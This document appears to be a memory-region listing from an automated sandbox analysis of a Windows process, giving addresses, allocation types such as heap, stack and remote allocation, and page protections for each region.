23EE2000
direct allocation
page execute and read and write
7FEE000
stack
page read and write
47AE000
stack
page read and write
BA7640E000
stack
page read and write
2AC4000
heap
page read and write
7A9D000
heap
page read and write
2B01000
heap
page read and write
C0E000
heap
page read and write
234C000
system
page read and write
8230000
direct allocation
page read and write
2C7A000
heap
page read and write
13EFE490000
heap
page read and write
BE7000
heap
page read and write
F022DFF000
stack
page read and write
81F0000
direct allocation
page read and write
8678000
heap
page read and write
2CBF000
stack
page read and write
2B01000
heap
page read and write
239F2000
heap
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
77D8000
remote allocation
page execute and read and write
2B01000
heap
page read and write
77A0000
trusted library allocation
page read and write
70BE000
stack
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
1C0A744E000
heap
page read and write
188422F7000
heap
page read and write
BE0000
heap
page read and write
2D23000
heap
page read and write
2B01000
heap
page read and write
7FC3000
heap
page read and write
1C0AB4DE000
trusted library allocation
page read and write
7A3C000
heap
page read and write
7FFD9BAF0000
trusted library allocation
page read and write
2D63000
heap
page read and write
7FFD9BA70000
trusted library allocation
page read and write
B40000
unkown
page readonly
1C0A99BF000
trusted library allocation
page read and write
7FD3000
heap
page read and write
2B01000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
7A18000
heap
page read and write
BA7650A000
stack
page read and write
7A13000
heap
page read and write
7A46000
heap
page read and write
1C0AB2CD000
trusted library allocation
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
1C0A9E63000
trusted library allocation
page read and write
77B0000
trusted library allocation
page read and write
7780000
trusted library allocation
page read and write
237FB000
stack
page read and write
86A000
stack
page read and write
770E000
stack
page read and write
6CEE000
stack
page read and write
1C0C15A1000
heap
page read and write
AB0000
heap
page read and write
6F00000
direct allocation
page read and write
2BABB010000
heap
page read and write
9050000
direct allocation
page execute and read and write
7FC3000
heap
page read and write
2B01000
heap
page read and write
718E000
stack
page read and write
1C0A9E3B000
trusted library allocation
page read and write
2600000
heap
page read and write
2B01000
heap
page read and write
2604000
heap
page read and write
2B01000
heap
page read and write
23E6D000
direct allocation
page execute and read and write
7820000
trusted library allocation
page read and write
4F87000
trusted library allocation
page read and write
980000
heap
page read and write
79EF000
heap
page read and write
1C0A9060000
heap
page execute and read and write
7FFD9B7A0000
trusted library allocation
page read and write
2B01000
heap
page read and write
7280000
heap
page read and write
1C0C15C6000
heap
page read and write
7F78000
heap
page read and write
1C0A8EB0000
heap
page readonly
1C0A9130000
heap
page read and write
7FFD9B8A0000
trusted library allocation
page execute and read and write
13EFE760000
heap
page read and write
18843E17000
trusted library allocation
page read and write
7AAC000
heap
page read and write
2B01000
heap
page read and write
469C000
heap
page read and write
4979000
direct allocation
page execute and read and write
7FFA000
heap
page read and write
2B01000
heap
page read and write
7FE0000
heap
page read and write
1C0A74E0000
heap
page read and write
88B0000
direct allocation
page read and write
7FFD9B93A000
trusted library allocation
page read and write
2B01000
heap
page read and write
BA7638F000
stack
page read and write
1C0C18A7000
heap
page read and write
4BA2000
unclassified section
page read and write
2B01000
heap
page read and write
1C0A73D0000
heap
page read and write
2B01000
heap
page read and write
2CA1000
heap
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
2D12000
heap
page read and write
2DB0000
heap
page read and write
53AF000
stack
page read and write
47D0000
heap
page execute and read and write
7FFD9B9A0000
trusted library allocation
page read and write
3BD8000
remote allocation
page execute and read and write
8870000
direct allocation
page read and write
485F000
stack
page read and write
4779000
trusted library allocation
page read and write
577000
unkown
page readonly
2664E000
unclassified section
page execute and read and write
8080000
heap
page readonly
7482000
heap
page read and write
2B01000
heap
page read and write
23B1F000
heap
page read and write
47C9000
heap
page read and write
BD7000
heap
page read and write
7FFD9B78D000
trusted library allocation
page execute and read and write
1C0AAF41000
trusted library allocation
page read and write
1C0C15E3000
heap
page read and write
560000
unkown
page readonly
7810000
trusted library allocation
page read and write
3100000
heap
page read and write
23841000
heap
page read and write
2CAF000
heap
page read and write
2B01000
heap
page read and write
BA755BE000
stack
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
2B01000
heap
page read and write
1C0AB4F2000
trusted library allocation
page read and write
59D8000
remote allocation
page execute and read and write
2B01000
heap
page read and write
B50000
unkown
page read and write
7AA1000
heap
page read and write
5E0000
heap
page read and write
1C0A745D000
heap
page read and write
7800000
trusted library allocation
page read and write
1C0A8DD0000
heap
page read and write
13EFE420000
heap
page read and write
7FFD9B962000
trusted library allocation
page read and write
7FD7000
heap
page read and write
73E0000
heap
page read and write
2DAD000
stack
page read and write
BA7547E000
stack
page read and write
48D0000
trusted library allocation
page read and write
1C0A7474000
heap
page read and write
2B01000
heap
page read and write
1171000
unkown
page readonly
DE0000
unkown
page readonly
575000
unkown
page read and write
944000
heap
page read and write
2B01000
heap
page read and write
248F0000
unclassified section
page execute and read and write
B20000
unkown
page read and write
944000
heap
page read and write
8360000
heap
page read and write
2B01000
heap
page read and write
1C0A75F0000
heap
page read and write
6F60000
direct allocation
page read and write
575000
unkown
page read and write
2B01000
heap
page read and write
8260000
direct allocation
page read and write
BA0000
heap
page read and write
2BABB015000
heap
page read and write
2B01000
heap
page read and write
1C0C17E1000
heap
page read and write
6D6E000
stack
page read and write
9B0000
unkown
page readonly
2B01000
heap
page read and write
2DB0000
heap
page read and write
1C0C1669000
heap
page read and write
2770000
heap
page read and write
2383C000
stack
page read and write
1C0C17D1000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
47EF000
stack
page read and write
2B01000
heap
page read and write
8840000
trusted library allocation
page read and write
7A68000
heap
page read and write
1161000
unkown
page readonly
7FFD9B840000
trusted library allocation
page execute and read and write
2D54000
heap
page read and write
47B0000
trusted library allocation
page read and write
2C00000
trusted library allocation
page read and write
2D3C000
heap
page read and write
1C0A9E55000
trusted library allocation
page read and write
18843E0E000
trusted library allocation
page read and write
297C000
unkown
page read and write
2CD0000
direct allocation
page read and write
23E71000
direct allocation
page execute and read and write
8210000
direct allocation
page read and write
960000
unkown
page readonly
2B01000
heap
page read and write
188422F0000
heap
page read and write
297C000
stack
page read and write
7FFD9BB00000
trusted library allocation
page read and write
1161000
unkown
page readonly
2B01000
heap
page read and write
C428000
direct allocation
page execute and read and write
1C0C17CD000
heap
page read and write
3070000
heap
page read and write
483A000
heap
page read and write
2C00000
trusted library allocation
page read and write
3144000
trusted library allocation
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
188420E0000
system
page execute and read and write
5A0000
unkown
page readonly
7FFD9B830000
trusted library allocation
page read and write
AC0000
unkown
page read and write
7AC6000
heap
page read and write
8300000
heap
page read and write
7FFD9BA80000
trusted library allocation
page read and write
1C0A9481000
trusted library allocation
page read and write
2B01000
heap
page read and write
486E000
stack
page read and write
5025000
system
page execute and read and write
2B01000
heap
page read and write
2C00000
trusted library allocation
page read and write
73D0000
heap
page read and write
44EF000
unkown
page execute and read and write
2B01000
heap
page read and write
13EFFEA0000
heap
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
1C0A8EA0000
trusted library allocation
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
1C0A9E1A000
trusted library allocation
page read and write
2B01000
heap
page read and write
6F40000
direct allocation
page read and write
2B01000
heap
page read and write
BA74EF6000
stack
page read and write
6DD8000
remote allocation
page execute and read and write
B80000
unkown
page readonly
73B0000
heap
page execute and read and write
2B01000
heap
page read and write
BE7000
heap
page read and write
8240000
direct allocation
page read and write
8340000
trusted library allocation
page read and write
44703FE000
stack
page read and write
18842290000
heap
page read and write
476B000
stack
page read and write
950000
unkown
page readonly
2B01000
heap
page read and write
30C1000
heap
page read and write
B20000
unkown
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
1C0A8EC0000
trusted library allocation
page read and write
8090000
heap
page read and write
9A0000
unkown
page readonly
73F0000
heap
page read and write
85AD000
stack
page read and write
768E000
stack
page read and write
48AF000
stack
page read and write
BA753FE000
stack
page read and write
5B0000
unkown
page readonly
7FE1000
heap
page read and write
494C000
trusted library allocation
page read and write
2B01000
heap
page read and write
79F2000
heap
page read and write
23BA0000
direct allocation
page execute and read and write
8230000
trusted library allocation
page execute and read and write
2B01000
heap
page read and write
23CCD000
direct allocation
page execute and read and write
76CE000
stack
page read and write
2B01000
heap
page read and write
8200000
direct allocation
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
546C000
stack
page read and write
32F0000
heap
page read and write
2800000
unkown
page execute and read and write
2B01000
heap
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
18843E21000
trusted library allocation
page read and write
2B01000
heap
page read and write
856C000
stack
page read and write
2B01000
heap
page read and write
960000
unkown
page readonly
560000
unkown
page readonly
4F9F000
trusted library allocation
page read and write
7FBE000
heap
page read and write
7FE7000
heap
page read and write
2B01000
heap
page read and write
944000
heap
page read and write
25F6EAC000
stack
page read and write
8890000
direct allocation
page read and write
570F000
stack
page read and write
2B01000
heap
page read and write
47C5000
heap
page read and write
1C0A7481000
heap
page read and write
7432000
heap
page read and write
1C0AAC6A000
trusted library allocation
page read and write
87F0000
trusted library allocation
page read and write
1C0A9E29000
trusted library allocation
page read and write
81B0000
direct allocation
page read and write
2B01000
heap
page read and write
7A95000
heap
page read and write
2B10000
heap
page read and write
1884211F000
system
page execute and read and write
DD0000
unkown
page readonly
AD0000
heap
page read and write
2A3E000
stack
page read and write
2B01000
heap
page read and write
BD0000
heap
page read and write
7490000
heap
page read and write
44E1000
heap
page read and write
2B01000
heap
page read and write
82FE000
stack
page read and write
2D36000
heap
page read and write
481E000
stack
page read and write
1C0C18C1000
heap
page read and write
2B01000
heap
page read and write
7A36000
heap
page read and write
3200000
unkown
page execute and read and write
1C0A9E5F000
trusted library allocation
page read and write
2B01000
heap
page read and write
2C62000
heap
page read and write
2B01000
heap
page read and write
6F50000
direct allocation
page read and write
2373D000
stack
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
BA759BB000
stack
page read and write
970000
unkown
page readonly
8800000
trusted library allocation
page read and write
1C0C15D9000
heap
page read and write
707B000
stack
page read and write
2132000
system
page read and write
58F1000
trusted library allocation
page read and write
561000
unkown
page execute read
8240000
trusted library allocation
page read and write
2B01000
heap
page read and write
8621000
heap
page read and write
2BABAC60000
heap
page read and write
2D50000
heap
page read and write
5919000
trusted library allocation
page read and write
1884231B000
heap
page read and write
2B01000
heap
page read and write
7F5E000
stack
page read and write
590000
unkown
page readonly
1C0A7479000
heap
page read and write
B028000
direct allocation
page execute and read and write
2B01000
heap
page read and write
7AF0000
trusted library allocation
page read and write
482E000
stack
page read and write
BA7593E000
stack
page read and write
13EFE440000
heap
page read and write
1C0AAF57000
trusted library allocation
page read and write
82BE000
stack
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
5F0000
unkown
page readonly
852C000
stack
page read and write
1C0C159A000
heap
page read and write
7FFD9B950000
trusted library allocation
page execute and read and write
47C0000
heap
page readonly
313F000
stack
page read and write
2DD0000
heap
page read and write
77E0000
trusted library allocation
page read and write
A10000
trusted library allocation
page read and write
29B8000
stack
page read and write
3000000
remote allocation
page execute and read and write
802E000
stack
page read and write
2B01000
heap
page read and write
18843F01000
trusted library allocation
page read and write
BA7658B000
stack
page read and write
2B01000
heap
page read and write
3078000
heap
page read and write
7F6F000
stack
page read and write
32AE000
stack
page read and write
7FFD9BB10000
trusted library allocation
page read and write
7FFD9BA00000
trusted library allocation
page read and write
478A000
trusted library allocation
page execute and read and write
1C0A8F30000
trusted library allocation
page read and write
2D20000
heap
page read and write
7FDC000
heap
page read and write
7421000
heap
page read and write
27A5000
heap
page read and write
2B01000
heap
page read and write
446F3FD000
stack
page read and write
7830000
trusted library allocation
page read and write
18843E00000
trusted library allocation
page read and write
2B01000
heap
page read and write
2C30000
heap
page read and write
1C0B9490000
trusted library allocation
page read and write
B00000
unkown
page read and write
7640000
trusted library allocation
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
25BDF000
unclassified section
page execute and read and write
18843AD0000
trusted library allocation
page read and write
44E0000
trusted library allocation
page read and write
DE0000
unkown
page readonly
7FC1000
heap
page read and write
2377B000
stack
page read and write
560000
unkown
page readonly
2EED000
stack
page read and write
7A8E000
heap
page read and write
806F000
stack
page read and write
542E000
stack
page read and write
7FD3000
heap
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
48BC000
stack
page read and write
727F000
stack
page read and write
2DDB000
stack
page read and write
8880000
direct allocation
page read and write
1C0A74BE000
heap
page read and write
1C0A75C0000
heap
page read and write
18843AD0000
trusted library allocation
page read and write
7790000
trusted library allocation
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
B80000
unkown
page readonly
81D0000
direct allocation
page read and write
2B01000
heap
page read and write
6CA5000
heap
page execute and read and write
2D27000
heap
page read and write
577000
unkown
page readonly
93C000
stack
page read and write
48F1000
trusted library allocation
page read and write
2B01000
heap
page read and write
56E000
unkown
page readonly
2B01000
heap
page read and write
18842320000
heap
page read and write
7FC1000
heap
page read and write
25F6FAF000
stack
page read and write
1C0A9070000
heap
page execute and read and write
77F0000
trusted library allocation
page read and write
1C0A9100000
heap
page read and write
2AA8000
heap
page read and write
2C40000
heap
page read and write
1C0C1807000
heap
page read and write
2B01000
heap
page read and write
8330000
trusted library allocation
page read and write
13EFE765000
heap
page read and write
8220000
heap
page read and write
6D2E000
stack
page read and write
5028000
system
page execute and read and write
2B01000
heap
page read and write
3143000
trusted library allocation
page execute and read and write
2B01000
heap
page read and write
BA7648D000
stack
page read and write
2B01000
heap
page read and write
692E000
stack
page read and write
7FFD9B920000
trusted library allocation
page read and write
2B01000
heap
page read and write
577000
unkown
page readonly
1C0C18B9000
heap
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
26BB000
stack
page read and write
1C0A8E70000
trusted library allocation
page read and write
5B9C000
trusted library allocation
page read and write
2B01000
heap
page read and write
7A58000
heap
page read and write
30DF000
heap
page read and write
6FBE000
stack
page read and write
575000
unkown
page read and write
3130000
trusted library allocation
page read and write
BA4000
heap
page read and write
2072000
system
page read and write
2B01000
heap
page read and write
2970000
heap
page read and write
BD0000
heap
page read and write
1C0A7495000
heap
page read and write
236BF000
stack
page read and write
7FFD9B83C000
trusted library allocation
page execute and read and write
2604000
heap
page read and write
8320000
trusted library allocation
page read and write
1C0B976B000
trusted library allocation
page read and write
7A11000
heap
page read and write
4F5D000
stack
page read and write
BFF000
heap
page read and write
79FD000
heap
page read and write
4590000
trusted library allocation
page execute and read and write
7FFD9BA50000
trusted library allocation
page read and write
2B01000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
6F10000
direct allocation
page read and write
1C0C1489000
heap
page read and write
18843C30000
heap
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
3140000
trusted library allocation
page read and write
714E000
stack
page read and write
4C8F000
stack
page read and write
920000
heap
page read and write
2B01000
heap
page read and write
7770000
trusted library allocation
page execute and read and write
8850000
direct allocation
page read and write
2B01000
heap
page read and write
88A0000
trusted library allocation
page execute and read and write
800000
unkown
page readonly
2B01000
heap
page read and write
7FFD9B79B000
trusted library allocation
page read and write
25F6F2F000
stack
page read and write
741E000
heap
page read and write
48C0000
trusted library allocation
page execute and read and write
2B01000
heap
page read and write
AD0000
heap
page read and write
2B01000
heap
page read and write
4E7C000
unclassified section
page read and write
2B01000
heap
page read and write
1C0A9999000
trusted library allocation
page read and write
7DF4DE0A0000
trusted library allocation
page execute and read and write
7A0E000
heap
page read and write
1170000
unkown
page readonly
BA74F7E000
stack
page read and write
2B01000
heap
page read and write
AD0000
heap
page read and write
703E000
stack
page read and write
4C3E000
stack
page read and write
2F6E000
stack
page read and write
B30000
heap
page read and write
2DD7000
heap
page read and write
AF0000
heap
page read and write
476C000
stack
page read and write
2B01000
heap
page read and write
7FFD9B836000
trusted library allocation
page read and write
A628000
direct allocation
page execute and read and write
93C000
stack
page read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
23963000
heap
page read and write
2B01000
heap
page read and write
7620000
trusted library allocation
page read and write
2B01000
heap
page read and write
4F5E000
unkown
page execute and read and write
7A72000
heap
page read and write
1C0C17A0000
heap
page read and write
DDF000
stack
page read and write
B40000
unkown
page read and write
2B01000
heap
page read and write
2710000
unkown
page readonly
2B01000
heap
page read and write
3420000
heap
page read and write
1C0A747D000
heap
page read and write
7FFD9B784000
trusted library allocation
page read and write
2D30000
heap
page read and write
2922000
unkown
page read and write
5264000
unclassified section
page read and write
2AB7000
heap
page read and write
B60000
unkown
page read and write
2B01000
heap
page read and write
2BABAE60000
heap
page read and write
314D000
trusted library allocation
page execute and read and write
7630000
trusted library allocation
page read and write
236D0000
heap
page read and write
763A000
trusted library allocation
page read and write
446FBFE000
stack
page read and write
29DE000
unkown
page read and write
9B0000
unkown
page readonly
2770000
unkown
page readonly
26F9000
stack
page read and write
8097000
heap
page read and write
2D10000
direct allocation
page read and write
79ED000
heap
page read and write
1C0B9481000
trusted library allocation
page read and write
1C0C18B5000
heap
page read and write
B11000
unkown
page readonly
2B01000
heap
page read and write
5F0000
unkown
page readonly
2B01000
heap
page read and write
741B000
heap
page read and write
8310000
trusted library allocation
page execute and read and write
2C70000
heap
page read and write
1C0C1899000
heap
page read and write
6EBD000
stack
page read and write
86A000
stack
page read and write
2B01000
heap
page read and write
1C0A75E0000
heap
page read and write
2B01000
heap
page read and write
2C57000
heap
page read and write
2FFF000
unkown
page read and write
4850000
direct allocation
page execute and read and write
2B01000
heap
page read and write
2B01000
heap
page read and write
B30000
heap
page read and write
2BABAE80000
heap
page read and write
6CA0000
heap
page execute and read and write
18842323000
heap
page read and write
25BC000
stack
page read and write
723E000
stack
page read and write
BA0000
heap
page read and write
1C0A7458000
heap
page read and write
56E000
unkown
page readonly
4B21000
direct allocation
page execute and read and write
7FFD9BA30000
trusted library allocation
page read and write
BA7527D000
stack
page read and write
18843FBE000
trusted library allocation
page read and write
18843E0A000
trusted library allocation
page read and write
1C0A8F84000
heap
page read and write
2DA0000
heap
page read and write
2862000
unkown
page read and write
1C0A8F80000
heap
page read and write
2B01000
heap
page read and write
1C0A99D6000
trusted library allocation
page read and write
536E000
stack
page read and write
2600000
heap
page read and write
23D3E000
direct allocation
page execute and read and write
2B01000
heap
page read and write
3210000
heap
page read and write
2B01000
heap
page read and write
4DEE000
stack
page read and write
2B01000
heap
page read and write
1C0C15DD000
heap
page read and write
18843AD0000
trusted library allocation
page read and write
2C62000
heap
page read and write
2B01000
heap
page read and write
4BB3000
unclassified section
page read and write
467E000
stack
page read and write
18843D00000
trusted library allocation
page read and write
AA0000
unkown
page read and write
BB0000
unkown
page read and write
There are 1043 hidden memdumps, click here to show them.